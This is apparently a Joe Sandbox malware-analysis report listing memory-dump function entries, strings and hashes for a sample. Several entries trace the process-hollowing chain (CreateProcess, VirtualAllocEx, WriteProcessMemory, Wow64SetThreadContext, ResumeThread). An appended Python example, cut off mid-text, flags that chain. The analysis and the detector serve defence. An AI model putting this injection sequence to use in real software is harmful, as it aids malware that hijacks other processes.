                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 943b14defb7ee51fa2ed6b119df21b35b1ca53e390b3789177453562268dd1aa
                                                                                    • Instruction ID: 45914ea70b3be3b7792cf5b539a0809bdfb5badec5f98316533866b0160b5ab6
                                                                                    • Opcode Fuzzy Hash: 943b14defb7ee51fa2ed6b119df21b35b1ca53e390b3789177453562268dd1aa
                                                                                    • Instruction Fuzzy Hash: CC90026170140407E102719844246060009D7D2346FD5C012E3428555DC6259B57A233
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc97bdeb064d162ee5832a1f485278e0e8422d5d0c5946f21ee7ea1d434f8154
                                                                                    • Instruction ID: 11f847d52906628e1c20e610df553ad8d427c9c2956dbe963d98af507769a346
                                                                                    • Opcode Fuzzy Hash: dc97bdeb064d162ee5832a1f485278e0e8422d5d0c5946f21ee7ea1d434f8154
                                                                                    • Instruction Fuzzy Hash: 0490026174140807E140719884247070006D7D1702F95C011A2028554DC6169B6967B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30b47b0c8d07cc9e4dbcd334fa9a9593008ff48db3f662233373fcb88a32245b
                                                                                    • Instruction ID: 314d452b1d493f99001ad6c028d597fe27681615ee76749bb1bda35a2f995e7a
                                                                                    • Opcode Fuzzy Hash: 30b47b0c8d07cc9e4dbcd334fa9a9593008ff48db3f662233373fcb88a32245b
                                                                                    • Instruction Fuzzy Hash: FB90026170184447E14072984814B0F410597E2303FD5C019A615A554CC9159A595732
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 42abe4b1768c117c7858505c05ff3929023012d18ab3cc638df7c21aa8f0bb57
                                                                                    • Instruction ID: 3339dc2e5b4cbba3bfd4d52f58b178b57ab2e5f7915addd00cd9b84d7ffac29e
                                                                                    • Opcode Fuzzy Hash: 42abe4b1768c117c7858505c05ff3929023012d18ab3cc638df7c21aa8f0bb57
                                                                                    • Instruction Fuzzy Hash: DA90026174545107E150719C44146164005B7E1302F95C021A2818594DC5559A596332
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7b6eac02cf1828035d8454e2be33087a1865fdd2dfc1cd5a5f09971ba89f0bc5
                                                                                    • Instruction ID: 0abcea5a499945d62778eba0788bc4c726b7a0f4e8ef4cf77bfbb034f969d4c3
                                                                                    • Opcode Fuzzy Hash: 7b6eac02cf1828035d8454e2be33087a1865fdd2dfc1cd5a5f09971ba89f0bc5
                                                                                    • Instruction Fuzzy Hash: 0190027170240147A54072985814A4E410597E2303BD5D415A2019554CC9149A655332
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ae9f029575d361ee4778b96a7f5effb5089f8ca62114c671f19dd7819bd66e4
                                                                                    • Instruction ID: c3be5b6c9c49df2194e71b8a3ab3567c9ea05834f99381ccab9fd360e2642f7c
                                                                                    • Opcode Fuzzy Hash: 8ae9f029575d361ee4778b96a7f5effb5089f8ca62114c671f19dd7819bd66e4
                                                                                    • Instruction Fuzzy Hash: 6090027570140407E51071985814646004697D1302F95D411A2428558DC6549AA5A232
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: b40723a53c878674e63a14f65542ca1db8a50b58ba9d29032841b104a2c1fdcc
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 7fd046a8551995ede277d80e413de8e014e25060c3597d9d4cb32f25eb35b735
                                                                                    • Instruction ID: 4784d5be2d3de751a9f6930b014048ca4f381f420120d879f32b072c63fba797
                                                                                    • Opcode Fuzzy Hash: 7fd046a8551995ede277d80e413de8e014e25060c3597d9d4cb32f25eb35b735
                                                                                    • Instruction Fuzzy Hash: 8951D3A6A0011ABFDF15DB9C889097EFBB9BB58340758C229F4A5E7641E334DF4087A0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 4afa1aa6f718db8fe380e753e9360144ca8899cb66894698cfeab52fb253cdbb
                                                                                    • Instruction ID: cf9a4c4968fbf85399f0d3820b6218e86ffe4ebaaa3f76040506277582e38c42
                                                                                    • Opcode Fuzzy Hash: 4afa1aa6f718db8fe380e753e9360144ca8899cb66894698cfeab52fb253cdbb
                                                                                    • Instruction Fuzzy Hash: 57510671A00646AFDB32DF5CC89487EBBFCEF48201B44886AF5DAD7681DA74DA008760
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 018C4787
                                                                                    • Execute=1, xrefs: 018C4713
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018C4655
                                                                                    • ExecuteOptions, xrefs: 018C46A0
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018C4725
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018C46FC
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018C4742
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: 20dfce7f704ac81b56891871020505e1b73444fc2f252ff4c96a6b8bfae80844
                                                                                    • Instruction ID: e61b036f450a6fda57d3d059d08faea42df97356d9ea389e1a7a8000a32c1919
                                                                                    • Opcode Fuzzy Hash: 20dfce7f704ac81b56891871020505e1b73444fc2f252ff4c96a6b8bfae80844
                                                                                    • Instruction Fuzzy Hash: 4C51283160021D7AEF21FBA8DC99FAD77B8EF54708F2800A9D605E7281E7709B45CB51
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: 8ac9f5be2c3db8f5fadc1d5114b6e3bd1b7c5500a6fae95f412160ac80c125b2
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 5381B170E15249AFEF258E6CE891FFEBBB1AF45360F1C4219E851E7291C7349A40CB91
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018C02E7
                                                                                    • RTL: Re-Waiting, xrefs: 018C031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018C02BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 018C7BAC
                                                                                    • RTL: Resource at %p, xrefs: 018C7B8E
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018C7B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018C728C
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 018C72C1
                                                                                    • RTL: Resource at %p, xrefs: 018C72A3
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018C7294
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280

                                                                                    Execution Graph

                                                                                    Execution Coverage:7.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:71
                                                                                    Total number of Limit Nodes:9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00B6D1D6
                                                                                    • GetCurrentThread.KERNEL32 ref: 00B6D213
                                                                                    • GetCurrentProcess.KERNEL32 ref: 00B6D250
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B6D2A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ProcessThread
                                                                                    • String ID:
                                                                                    • API String ID: 2063062207-0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C1D23E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B659A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B659A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05248E35,?,?), ref: 05248EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1415346913.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_5240000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: 257cc2f9dacf163394261e94ca92a81485eb5efaaf88ccf2068fd8bbb833b3cb
                                                                                    • Instruction ID: ea9067609b7ba29e029ecaf695223db47f92d0e1466a85a7ebb94c8716f7ac0d
                                                                                    • Opcode Fuzzy Hash: 257cc2f9dacf163394261e94ca92a81485eb5efaaf88ccf2068fd8bbb833b3cb
                                                                                    • Instruction Fuzzy Hash: 9731E2B5D1030A9FDB14CF9AD880AAEBBF5FF48214F14842AE919A7210D775A940CFA4

                                                                                    Control-flow Graph
                                                                                    • Blocks: 248 5248e48-5248e9c; 249 5248ea7-5248eb6; 250 5248e9e-5248ea4; 251 5248eb8; 252 5248ebb-5248ef4 [DrawTextExW]; 253 5248ef6-5248efc; 254 5248efd-5248f1a
                                                                                    • Edges: 248->249, 248->250, 249->251, 249->252, 250->249, 251->252, 252->253, 252->254, 253->254
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05248E35,?,?), ref: 05248EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1415346913.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_5240000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: b398b03c2c21b3ea15372f32c00bc532bef7227682e5f6cbc13b6cd62f375e46
                                                                                    • Instruction ID: 94d318c79b89e9103b7c16447f1397d4218bb18b5d8b36f17b619fb2e32db314
                                                                                    • Opcode Fuzzy Hash: b398b03c2c21b3ea15372f32c00bc532bef7227682e5f6cbc13b6cd62f375e46
                                                                                    • Instruction Fuzzy Hash: 5231E0B6D1034A9FDB15CF9AD880AEEBBF5BF48310F14842AE919A7210D374A540CFA4

                                                                                    Control-flow Graph
                                                                                    • Blocks: 257 6c1cd80-6c1cdce; 259 6c1cdd0-6c1cddc; 260 6c1cdde-6c1ce1d [WriteProcessMemory]; 262 6c1ce26-6c1ce56; 263 6c1ce1f-6c1ce25
                                                                                    • Edges: 257->259, 257->260, 259->260, 260->262, 260->263, 263->262
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C1CE10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: c542bff7af9f30ca8cf404e15fa7b575d44b7afb3b549d1f48b4f91e0e74b1d9
                                                                                    • Instruction ID: 389e4427d085f43962f90231fb0c336c6a01c9f659cd200b542ed56dff0583e3
                                                                                    • Opcode Fuzzy Hash: c542bff7af9f30ca8cf404e15fa7b575d44b7afb3b549d1f48b4f91e0e74b1d9
                                                                                    • Instruction Fuzzy Hash: 972126B1D003099FDB10CFAAC881BDEBBF5FF48310F10842AE918A7240C7789950DBA4

                                                                                    Control-flow Graph
                                                                                    • Blocks: 277 6c1ce70-6c1cefd [ReadProcessMemory]; 280 6c1cf06-6c1cf36; 281 6c1ceff-6c1cf05
                                                                                    • Edges: 277->280, 277->281, 281->280
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C1CEF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: f0c1d1e585bf89d7c81bd25b34a7ae9f0443eb47aabd421b054c7b56a80dc30d
                                                                                    • Instruction ID: c294d1bc628ca2828618dc4f800decb5360dfa8cec6c4f5ff69f6fb09772692b
                                                                                    • Opcode Fuzzy Hash: f0c1d1e585bf89d7c81bd25b34a7ae9f0443eb47aabd421b054c7b56a80dc30d
                                                                                    • Instruction Fuzzy Hash: C62105B1C003599FDB10CFAAC840BDEBBF5BF48310F10842AE919A7240C7799540DBA5

                                                                                    Control-flow Graph
                                                                                    • Blocks: 267 6c1cbe8-6c1cc33; 269 6c1cc43-6c1cc73 [Wow64SetThreadContext]; 270 6c1cc35-6c1cc41; 272 6c1cc75-6c1cc7b; 273 6c1cc7c-6c1ccac
                                                                                    • Edges: 267->269, 267->270, 269->272, 269->273, 270->269, 272->273
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1CC66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: cd41d02c083988a6fa2e04f2beefa26501da5081cc82b50a50db53ebce24e9a3
                                                                                    • Instruction ID: 58b70a3a6d42ce61c6ea1cc638fe3d9f61d0836b8cd335578fa302d5749d7a6e
                                                                                    • Opcode Fuzzy Hash: cd41d02c083988a6fa2e04f2beefa26501da5081cc82b50a50db53ebce24e9a3
                                                                                    • Instruction Fuzzy Hash: 75213871D003098FDB24DFAAC484BEEBBF4EF48214F14842EE419A7240C7789945CFA5

                                                                                    Control-flow Graph
                                                                                    • Blocks: 285 b6d3a0-b6d434 [DuplicateHandle]; 286 b6d436-b6d43c; 287 b6d43d-b6d45a
                                                                                    • Edges: 285->286, 285->287, 286->287
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6D427
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: c261ce39a6dfe16b95d23c57fd76e9ecd7d2d454654fdbd943182bd165c4407b
                                                                                    • Instruction ID: f344d7c2b8e7d16a76fedf01fcfa0521588902951b86b8a119cf1a2bec572116
                                                                                    • Opcode Fuzzy Hash: c261ce39a6dfe16b95d23c57fd76e9ecd7d2d454654fdbd943182bd165c4407b
                                                                                    • Instruction Fuzzy Hash: 8B21C4B5D002499FDB10CFAAD984ADEBBF8FB48314F14841AE914A7350D379A944CF65

                                                                                    Control-flow Graph
                                                                                    • Blocks: 290 6c1ccc0-6c1cd3b [VirtualAllocEx]; 293 6c1cd44-6c1cd69; 294 6c1cd3d-6c1cd43
                                                                                    • Edges: 290->293, 290->294, 294->293
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C1CD2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1aab626a53a692d2fcce286638e2928f7ad5cba20595b0cfb78d97e133de2cf1
                                                                                    • Instruction ID: a9fb64456a9e758b6999ca1c637f0cc2de0a62108b356e96e76afd8db8f361d0
                                                                                    • Opcode Fuzzy Hash: 1aab626a53a692d2fcce286638e2928f7ad5cba20595b0cfb78d97e133de2cf1
                                                                                    • Instruction Fuzzy Hash: 1E112672C002499FDB24DFAAC844BDFBBF5AB48314F14841AE515A7250C779A540CBA5

                                                                                    Control-flow Graph
                                                                                    • Blocks: 298 6c1cb38-6c1cba7 [ResumeThread]; 301 6c1cbb0-6c1cbd5; 302 6c1cba9-6c1cbaf
                                                                                    • Edges: 298->301, 298->302, 302->301
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_6c10000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 5d89eb3c8ae81f9e56c625b6ab1c098b04ff5fbbbf30d70eebd1a1121dcc834f
                                                                                    • Instruction ID: 488792152e248deae261239dd2c74b60bfe9f84c03e2452d6b35115c6aad94ac
                                                                                    • Opcode Fuzzy Hash: 5d89eb3c8ae81f9e56c625b6ab1c098b04ff5fbbbf30d70eebd1a1121dcc834f
                                                                                    • Instruction Fuzzy Hash: 1E113AB1D003498FDB24DFAAC444BDFFBF4AB48214F24841ED419A7240C779A540CBA9
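Added example (not part of the Joe Sandbox report or its IDA plugin output): a small parser for the "APIs", "Memory Dump Source" and "API ID" fields of the function entries above. It groups the lifted functions by the memory-dump region they were taken from and checks whether one region covers the whole primitive set that process hollowing of a 32-bit target uses: VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread, which is what the report's "Injects a PE file into a foreign processes" and "Modifies the context of a thread in another process" signatures rest on. The chain is expressed in the report's own API ID vocabulary (AllocVirtual, MemoryProcessWrite, ContextThreadWow64, ResumeThread). The sample text is an excerpt constructed from the entries above; the regexes, the field order they assume and the FunctionEntry type are this example's assumptions about the report layout, not a documented Joe Sandbox schema.

```python
"""Group Joe Sandbox function entries by memory-dump region and flag the
process-hollowing primitive set. Added example; assumes the field layout
seen in the report above (APIs, then Memory Dump Source, then API ID)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt: the relevant fields of the entries above, in report order.
# The ResumeThread entry has an empty "APIs" list in the report, so it has no call line here either.
REPORT_EXCERPT = """
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C1CE10
• Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
• API ID: MemoryProcessWrite
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C1CEF0
• Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
• API ID: MemoryProcessRead
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C1CC66
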